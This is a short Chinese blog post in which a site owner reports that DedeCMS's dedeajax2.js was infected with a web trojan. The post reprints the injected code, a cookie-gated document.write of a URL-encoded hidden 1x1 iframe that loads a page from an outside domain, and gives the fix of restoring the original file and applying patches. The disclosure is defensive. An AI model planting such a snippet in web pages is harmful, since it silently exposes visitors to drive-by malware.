08-06
06

dede:dedeajax2.js被植入木马

    这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:
//初始化xmldom
function InitXDom(){
  if(DedeXDOM!=null) return;
  var obj = null;
  if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
    var parser = new DOMParser();
    obj = parser.parseFromString(xmlText, "text/xml");
  } else { // IE
    try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
    if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
  }
  DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%39%38%35%36%37%36%2E%63%6E%2F%64%6F%77%6E%2F%72%65%70%6F%72%74%2F%32%30%30%34%30%36%2E%68%74%6D%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));}

-->
用原版本的dedeajax2覆盖,即可。
这个文件,dede的模板都要用到,搜索了,没有发现说明用处。

不过建议大家,多注意dede的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。


文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: dede
相关日志:
评论: 0 | 引用: 0 | 查看次数: 943
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭